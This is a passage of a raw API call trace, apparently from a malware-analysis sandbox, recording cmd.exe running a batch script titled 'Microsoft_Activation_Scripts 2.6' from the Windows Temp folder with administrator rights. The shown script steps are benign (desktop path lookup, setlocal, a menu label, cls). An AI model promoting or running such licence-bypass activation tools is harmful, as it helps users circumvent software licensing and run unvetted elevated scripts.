$([Environment]::GetFolderPath('Desktop'))}\"') do call set \"_desktop_=%%a\"\r\n_desktop_=%%b\"\r\n") returned 33 [0180.196] _get_osfhandle (_FileHandle=3) returned 0x9c [0180.197] GetFileType (hFile=0x9c) returned 0x1 [0180.197] _get_osfhandle (_FileHandle=3) returned 0x9c [0180.197] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x230d [0180.197] GetProcessHeap () returned 0x19a8f1e0000 [0180.197] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0180.197] GetProcessHeap () returned 0x19a8f1e0000 [0180.198] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0180.198] _wcsicmp (_String1="setlocal", _String2=")") returned 74 [0180.198] _wcsicmp (_String1="FOR", _String2="setlocal") returned -13 [0180.198] _wcsicmp (_String1="FOR/?", _String2="setlocal") returned -13 [0180.198] _wcsicmp (_String1="IF", _String2="setlocal") returned -10 [0180.198] _wcsicmp (_String1="IF/?", _String2="setlocal") returned -10 [0180.198] _wcsicmp (_String1="REM", _String2="setlocal") returned -1 [0180.198] _wcsicmp (_String1="REM/?", _String2="setlocal") returned -1 [0180.198] GetProcessHeap () returned 0x19a8f1e0000 [0180.198] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee310 [0180.198] GetProcessHeap () returned 0x19a8f1e0000 [0180.198] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x22) returned 0x19a8f1eb800 [0180.198] GetProcessHeap () returned 0x19a8f1e0000 [0180.198] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x40) returned 0x19a8f1f94a0 [0180.198] _tell (_FileHandle=3) returned 8973 [0180.198] _close (_FileHandle=3) returned 0 [0180.199] _wcsicmp (_String1="setlocal", _String2="DIR") returned 15 [0180.199] _wcsicmp (_String1="setlocal", _String2="ERASE") returned 14 [0180.199] _wcsicmp (_String1="setlocal", _String2="DEL") returned 15 [0180.199] _wcsicmp (_String1="setlocal", _String2="TYPE") returned -1 [0180.199] _wcsicmp (_String1="setlocal", _String2="COPY") returned 16 [0180.199] _wcsicmp (_String1="setlocal", _String2="CD") returned 16 [0180.199] _wcsicmp (_String1="setlocal", _String2="CHDIR") returned 16 [0180.199] _wcsicmp (_String1="setlocal", _String2="RENAME") returned 1 [0180.199] _wcsicmp (_String1="setlocal", _String2="REN") returned 1 [0180.199] _wcsicmp (_String1="setlocal", _String2="ECHO") returned 14 [0180.199] _wcsicmp (_String1="setlocal", _String2="SET") returned 108 [0180.199] _wcsicmp (_String1="setlocal", _String2="PAUSE") returned 3 [0180.199] _wcsicmp (_String1="setlocal", _String2="DATE") returned 15 [0180.199] _wcsicmp (_String1="setlocal", _String2="TIME") returned -1 [0180.199] _wcsicmp (_String1="setlocal", _String2="PROMPT") returned 3 [0180.199] _wcsicmp (_String1="setlocal", _String2="MD") returned 6 [0180.199] _wcsicmp (_String1="setlocal", _String2="MKDIR") returned 6 [0180.199] _wcsicmp (_String1="setlocal", _String2="RD") returned 1 [0180.199] _wcsicmp (_String1="setlocal", _String2="RMDIR") returned 1 [0180.199] _wcsicmp (_String1="setlocal", _String2="PATH") returned 3 [0180.199] _wcsicmp (_String1="setlocal", _String2="GOTO") returned 12 [0180.200] _wcsicmp (_String1="setlocal", _String2="SHIFT") returned -3 [0180.200] _wcsicmp (_String1="setlocal", _String2="CLS") returned 16 [0180.200] _wcsicmp (_String1="setlocal", _String2="CALL") returned 16 [0180.200] _wcsicmp (_String1="setlocal", _String2="VERIFY") returned -3 [0180.200] _wcsicmp (_String1="setlocal", _String2="VER") returned -3 [0180.200] _wcsicmp (_String1="setlocal", _String2="VOL") returned -3 [0180.200] _wcsicmp (_String1="setlocal", _String2="EXIT") returned 14 [0180.200] _wcsicmp (_String1="setlocal", _String2="SETLOCAL") returned 0 [0180.200] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0180.201] _wcsicmp (_String1="setlocal", _String2="DIR") returned 15 [0180.201] _wcsicmp (_String1="setlocal", _String2="ERASE") returned 14 [0180.201] _wcsicmp (_String1="setlocal", _String2="DEL") returned 15 [0180.201] _wcsicmp (_String1="setlocal", _String2="TYPE") returned -1 [0180.201] _wcsicmp (_String1="setlocal", _String2="COPY") returned 16 [0180.201] _wcsicmp (_String1="setlocal", _String2="CD") returned 16 [0180.201] _wcsicmp (_String1="setlocal", _String2="CHDIR") returned 16 [0180.201] _wcsicmp (_String1="setlocal", _String2="RENAME") returned 1 [0180.201] _wcsicmp (_String1="setlocal", _String2="REN") returned 1 [0180.201] _wcsicmp (_String1="setlocal", _String2="ECHO") returned 14 [0180.201] _wcsicmp (_String1="setlocal", _String2="SET") returned 108 [0180.201] _wcsicmp (_String1="setlocal", _String2="PAUSE") returned 3 [0180.201] _wcsicmp (_String1="setlocal", _String2="DATE") returned 15 [0180.201] _wcsicmp (_String1="setlocal", _String2="TIME") returned -1 [0180.201] _wcsicmp (_String1="setlocal", _String2="PROMPT") returned 3 [0180.201] _wcsicmp (_String1="setlocal", _String2="MD") returned 6 [0180.201] _wcsicmp (_String1="setlocal", _String2="MKDIR") returned 6 [0180.201] _wcsicmp (_String1="setlocal", _String2="RD") returned 1 [0180.202] _wcsicmp (_String1="setlocal", _String2="RMDIR") returned 1 [0180.202] _wcsicmp (_String1="setlocal", _String2="PATH") returned 3 [0180.202] _wcsicmp (_String1="setlocal", _String2="GOTO") returned 12 [0180.202] _wcsicmp (_String1="setlocal", _String2="SHIFT") returned -3 [0180.202] _wcsicmp (_String1="setlocal", _String2="CLS") returned 16 [0180.202] _wcsicmp (_String1="setlocal", _String2="CALL") returned 16 [0180.202] _wcsicmp (_String1="setlocal", _String2="VERIFY") returned -3 [0180.202] _wcsicmp (_String1="setlocal", _String2="VER") returned -3 [0180.202] _wcsicmp (_String1="setlocal", _String2="VOL") returned -3 [0180.202] _wcsicmp (_String1="setlocal", _String2="EXIT") returned 14 [0180.202] _wcsicmp (_String1="setlocal", _String2="SETLOCAL") returned 0 [0180.202] GetProcessHeap () returned 0x19a8f1e0000 [0180.202] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x70) returned 0x19a8f1ef720 [0180.202] GetProcessHeap () returned 0x19a8f1e0000 [0180.202] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ef720, Size=0x40) returned 0x19a8f1f8eb0 [0180.202] GetProcessHeap () returned 0x19a8f1e0000 [0180.202] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1f8eb0) returned 0x40 [0180.202] GetProcessHeap () returned 0x19a8f1e0000 [0180.202] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x52) returned 0x19a8f1f8820 [0180.202] GetProcessHeap () returned 0x19a8f1e0000 [0180.202] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec660 [0180.202] GetProcessHeap () returned 0x19a8f1e0000 [0180.202] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1eb860 [0180.202] GetProcessHeap () returned 0x19a8f1e0000 [0180.202] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x8) returned 0x19a8f1e82e0 [0180.203] GetEnvironmentStringsW () returned 0x19a8f209820* [0180.203] GetProcessHeap () returned 0x19a8f1e0000 [0180.203] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x100e) returned 0x19a8f2029e0 [0180.203] memcpy (in: _Dst=0x19a8f2029e0, _Src=0x19a8f209820, _Size=0x100e | out: _Dst=0x19a8f2029e0) returned 0x19a8f2029e0 [0180.203] FreeEnvironmentStringsA (penv="=") returned 1 [0180.203] GetProcessHeap () returned 0x19a8f1e0000 [0180.203] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x70) returned 0x19a8f1eeca0 [0180.203] GetProcessHeap () returned 0x19a8f1e0000 [0180.203] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eeca0, Size=0x40) returned 0x19a8f1f9180 [0180.203] GetProcessHeap () returned 0x19a8f1e0000 [0180.203] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1f9180) returned 0x40 [0180.203] _wcsicmp (_String1="EnableDelayedExpansion", _String2="ENABLEEXTENSIONS") returned -1 [0180.203] _wcsicmp (_String1="EnableDelayedExpansion", _String2="DISABLEEXTENSIONS") returned 1 [0180.203] _wcsicmp (_String1="EnableDelayedExpansion", _String2="ENABLEDELAYEDEXPANSION") returned 0 [0180.203] GetProcessHeap () returned 0x19a8f1e0000 [0180.204] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f94a0) returned 1 [0180.204] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.204] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0180.205] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.205] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0180.206] _get_osfhandle (_FileHandle=0) returned 0x20 [0180.206] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0180.206] SetConsoleInputExeNameW () returned 0x1 [0180.206] GetConsoleOutputCP () returned 0x1b5 [0180.207] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0180.207] SetThreadUILanguage (LangId=0x0) returned 0x409 [0180.207] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0180.208] _open_osfhandle (_OSFileHandle=0x9c, _Flags=8) returned 3 [0180.208] _get_osfhandle (_FileHandle=3) returned 0x9c [0180.208] SetFilePointer (in: hFile=0x9c, lDistanceToMove=8973, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x230d [0180.208] _get_osfhandle (_FileHandle=3) returned 0x9c [0180.208] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x230d [0180.208] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0180.208] SetFilePointer (in: hFile=0x9c, lDistanceToMove=8975, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x230f [0180.208] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\ntlocal EnableDelayedExpansion\r\ndelims=\" %%a in ('%psc% \"& {write-host $([Environment]::GetFolderPath('Desktop'))}\"') do call set \"_desktop_=%%a\"\r\n_desktop_=%%b\"\r\n") returned 2 [0180.208] _get_osfhandle (_FileHandle=3) returned 0x9c [0180.208] GetFileType (hFile=0x9c) returned 0x1 [0180.208] _get_osfhandle (_FileHandle=3) returned 0x9c [0180.208] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x230f [0180.208] GetProcessHeap () returned 0x19a8f1e0000 [0180.209] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0180.209] GetProcessHeap () returned 0x19a8f1e0000 [0180.209] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0180.210] _tell (_FileHandle=3) returned 8975 [0180.210] _close (_FileHandle=3) returned 0 [0180.210] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0180.210] _open_osfhandle (_OSFileHandle=0x9c, _Flags=8) returned 3 [0180.210] _get_osfhandle (_FileHandle=3) returned 0x9c [0180.210] SetFilePointer (in: hFile=0x9c, lDistanceToMove=8975, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x230f [0180.210] _get_osfhandle (_FileHandle=3) returned 0x9c [0180.210] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x230f [0180.210] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0180.211] SetFilePointer (in: hFile=0x9c, lDistanceToMove=9115, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x239b [0180.211] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="::========================================================================================================================================\r\n", cbMultiByte=140, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="::========================================================================================================================================\r\n_=%%a\"\r\n_desktop_=%%b\"\r\n") returned 140 [0180.211] _get_osfhandle (_FileHandle=3) returned 0x9c [0180.211] GetFileType (hFile=0x9c) returned 0x1 [0180.211] _get_osfhandle (_FileHandle=3) returned 0x9c [0180.211] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x239b [0180.211] GetProcessHeap () returned 0x19a8f1e0000 [0180.211] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0180.211] GetProcessHeap () returned 0x19a8f1e0000 [0180.212] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0180.212] _tell (_FileHandle=3) returned 9115 [0180.212] _close (_FileHandle=3) returned 0 [0180.212] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0180.212] _open_osfhandle (_OSFileHandle=0x9c, _Flags=8) returned 3 [0180.212] _get_osfhandle (_FileHandle=3) returned 0x9c [0180.212] SetFilePointer (in: hFile=0x9c, lDistanceToMove=9115, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x239b [0180.213] _get_osfhandle (_FileHandle=3) returned 0x9c [0180.213] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x239b [0180.213] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0180.213] SetFilePointer (in: hFile=0x9c, lDistanceToMove=9117, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x239d [0180.213] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\n========================================================================================================================================\r\n_=%%a\"\r\n_desktop_=%%b\"\r\n") returned 2 [0180.213] _get_osfhandle (_FileHandle=3) returned 0x9c [0180.213] GetFileType (hFile=0x9c) returned 0x1 [0180.213] _get_osfhandle (_FileHandle=3) returned 0x9c [0180.213] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x239d [0180.213] GetProcessHeap () returned 0x19a8f1e0000 [0180.213] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0180.213] GetProcessHeap () returned 0x19a8f1e0000 [0180.214] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0180.214] _tell (_FileHandle=3) returned 9117 [0180.214] _close (_FileHandle=3) returned 0 [0180.214] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0180.214] _open_osfhandle (_OSFileHandle=0x9c, _Flags=8) returned 3 [0180.214] _get_osfhandle (_FileHandle=3) returned 0x9c [0180.214] SetFilePointer (in: hFile=0x9c, lDistanceToMove=9117, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x239d [0180.214] _get_osfhandle (_FileHandle=3) returned 0x9c [0180.214] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x239d [0180.214] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0180.214] SetFilePointer (in: hFile=0x9c, lDistanceToMove=9128, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x23a8 [0180.215] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=":MainMenu\r\n", cbMultiByte=11, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr=":MainMenu\r\n===============================================================================================================================\r\n_=%%a\"\r\n_desktop_=%%b\"\r\n") returned 11 [0180.215] _get_osfhandle (_FileHandle=3) returned 0x9c [0180.215] GetFileType (hFile=0x9c) returned 0x1 [0180.215] _get_osfhandle (_FileHandle=3) returned 0x9c [0180.215] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x23a8 [0180.215] GetProcessHeap () returned 0x19a8f1e0000 [0180.215] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0180.215] GetProcessHeap () returned 0x19a8f1e0000 [0180.215] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0180.216] _tell (_FileHandle=3) returned 9128 [0180.216] _close (_FileHandle=3) returned 0 [0180.216] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0180.216] _open_osfhandle (_OSFileHandle=0x9c, _Flags=8) returned 3 [0180.216] _get_osfhandle (_FileHandle=3) returned 0x9c [0180.216] SetFilePointer (in: hFile=0x9c, lDistanceToMove=9128, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x23a8 [0180.216] _get_osfhandle (_FileHandle=3) returned 0x9c [0180.216] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x23a8 [0180.216] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0180.217] SetFilePointer (in: hFile=0x9c, lDistanceToMove=9130, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x23aa [0180.217] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\nainMenu\r\n===============================================================================================================================\r\n_=%%a\"\r\n_desktop_=%%b\"\r\n") returned 2 [0180.217] _get_osfhandle (_FileHandle=3) returned 0x9c [0180.217] GetFileType (hFile=0x9c) returned 0x1 [0180.217] _get_osfhandle (_FileHandle=3) returned 0x9c [0180.217] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x23aa [0180.217] GetProcessHeap () returned 0x19a8f1e0000 [0180.217] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0180.217] GetProcessHeap () returned 0x19a8f1e0000 [0180.217] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0180.218] _tell (_FileHandle=3) returned 9130 [0180.218] _close (_FileHandle=3) returned 0 [0180.218] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0180.218] _open_osfhandle (_OSFileHandle=0x9c, _Flags=8) returned 3 [0180.218] _get_osfhandle (_FileHandle=3) returned 0x9c [0180.218] SetFilePointer (in: hFile=0x9c, lDistanceToMove=9130, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x23aa [0180.218] _get_osfhandle (_FileHandle=3) returned 0x9c [0180.218] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x23aa [0180.218] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0180.218] SetFilePointer (in: hFile=0x9c, lDistanceToMove=9135, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x23af [0180.219] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="cls\r\n", cbMultiByte=5, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="cls\r\nMenu\r\n===============================================================================================================================\r\n_=%%a\"\r\n_desktop_=%%b\"\r\n") returned 5 [0180.219] _get_osfhandle (_FileHandle=3) returned 0x9c [0180.219] GetFileType (hFile=0x9c) returned 0x1 [0180.219] _get_osfhandle (_FileHandle=3) returned 0x9c [0180.219] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x23af [0180.219] GetProcessHeap () returned 0x19a8f1e0000 [0180.219] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0180.219] GetProcessHeap () returned 0x19a8f1e0000 [0180.219] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0180.219] _wcsicmp (_String1="cls", _String2=")") returned 58 [0180.219] _wcsicmp (_String1="FOR", _String2="cls") returned 3 [0180.219] _wcsicmp (_String1="FOR/?", _String2="cls") returned 3 [0180.220] _wcsicmp (_String1="IF", _String2="cls") returned 6 [0180.220] _wcsicmp (_String1="IF/?", _String2="cls") returned 6 [0180.220] _wcsicmp (_String1="REM", _String2="cls") returned 15 [0180.220] _wcsicmp (_String1="REM/?", _String2="cls") returned 15 [0180.220] GetProcessHeap () returned 0x19a8f1e0000 [0180.220] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee910 [0180.220] GetProcessHeap () returned 0x19a8f1e0000 [0180.220] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec720 [0180.220] _tell (_FileHandle=3) returned 9135 [0180.220] _close (_FileHandle=3) returned 0 [0180.220] _wcsicmp (_String1="cls", _String2="DIR") returned -1 [0180.220] _wcsicmp (_String1="cls", _String2="ERASE") returned -2 [0180.220] _wcsicmp (_String1="cls", _String2="DEL") returned -1 [0180.220] _wcsicmp (_String1="cls", _String2="TYPE") returned -17 [0180.220] _wcsicmp (_String1="cls", _String2="COPY") returned -3 [0180.220] _wcsicmp (_String1="cls", _String2="CD") returned 8 [0180.220] _wcsicmp (_String1="cls", _String2="CHDIR") returned 4 [0180.220] _wcsicmp (_String1="cls", _String2="RENAME") returned -15 [0180.220] _wcsicmp (_String1="cls", _String2="REN") returned -15 [0180.221] _wcsicmp (_String1="cls", _String2="ECHO") returned -2 [0180.221] _wcsicmp (_String1="cls", _String2="SET") returned -16 [0180.221] _wcsicmp (_String1="cls", _String2="PAUSE") returned -13 [0180.221] _wcsicmp (_String1="cls", _String2="DATE") returned -1 [0180.221] _wcsicmp (_String1="cls", _String2="TIME") returned -17 [0180.221] _wcsicmp (_String1="cls", _String2="PROMPT") returned -13 [0180.221] _wcsicmp (_String1="cls", _String2="MD") returned -10 [0180.221] _wcsicmp (_String1="cls", _String2="MKDIR") returned -10 [0180.221] _wcsicmp (_String1="cls", _String2="RD") returned -15 [0180.221] _wcsicmp (_String1="cls", _String2="RMDIR") returned -15 [0180.221] _wcsicmp (_String1="cls", _String2="PATH") returned -13 [0180.221] _wcsicmp (_String1="cls", _String2="GOTO") returned -4 [0180.221] _wcsicmp (_String1="cls", _String2="SHIFT") returned -16 [0180.221] _wcsicmp (_String1="cls", _String2="CLS") returned 0 [0180.221] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0180.222] _wcsicmp (_String1="cls", _String2="DIR") returned -1 [0180.222] _wcsicmp (_String1="cls", _String2="ERASE") returned -2 [0180.222] _wcsicmp (_String1="cls", _String2="DEL") returned -1 [0180.222] _wcsicmp (_String1="cls", _String2="TYPE") returned -17 [0180.222] _wcsicmp (_String1="cls", _String2="COPY") returned -3 [0180.222] _wcsicmp (_String1="cls", _String2="CD") returned 8 [0180.222] _wcsicmp (_String1="cls", _String2="CHDIR") returned 4 [0180.222] _wcsicmp (_String1="cls", _String2="RENAME") returned -15 [0180.222] _wcsicmp (_String1="cls", _String2="REN") returned -15 [0180.222] _wcsicmp (_String1="cls", _String2="ECHO") returned -2 [0180.222] _wcsicmp (_String1="cls", _String2="SET") returned -16 [0180.223] _wcsicmp (_String1="cls", _String2="PAUSE") returned -13 [0180.223] _wcsicmp (_String1="cls", _String2="DATE") returned -1 [0180.223] _wcsicmp (_String1="cls", _String2="TIME") returned -17 [0180.223] _wcsicmp (_String1="cls", _String2="PROMPT") returned -13 [0180.223] _wcsicmp (_String1="cls", _String2="MD") returned -10 [0180.223] _wcsicmp (_String1="cls", _String2="MKDIR") returned -10 